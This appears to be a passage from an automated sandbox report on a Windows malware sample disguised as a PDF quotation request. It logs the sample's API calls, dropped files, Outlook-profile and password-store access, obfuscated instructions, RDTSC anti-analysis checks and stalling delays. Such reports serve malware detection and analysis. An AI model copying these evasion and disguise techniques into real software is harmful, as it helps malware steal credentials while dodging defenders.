            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsl12EF.tmpJump to behavior
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035024000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035004000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034FF5000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3319784742.0000000035F2D000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034FE6000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeVirustotal: Detection: 46%
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile read: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA1DE1 push ds; retf 6137h4_2_37CA205E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C0868 pushad ; retf 4_2_383C0875
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C1181 pushfd ; retf 4_2_383C118D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C35E0 push D25837D1h; retf 4_2_383C35EE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C36F8 push D2DC37D1h; retf 4_2_383C3706
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: \request for quoation and prices 0910775_pdf.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: \request for quoation and prices 0910775_pdf.exeJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI/Special instruction interceptor: Address: 3A7608B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI/Special instruction interceptor: Address: 282608B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRDTSC instruction interceptor: First address: 3A35E5B second address: 3A35E5B instructions: 0x00000000 rdtsc 0x00000002 test bx, bx 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FF460FF6A33h 0x0000000b test ecx, ecx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRDTSC instruction interceptor: First address: 27E5E5B second address: 27E5E5B instructions: 0x00000000 rdtsc 0x00000002 test bx, bx 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FF460FF6B33h 0x0000000b test ecx, ecx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: 34F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: 36F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597265Jump to behavior
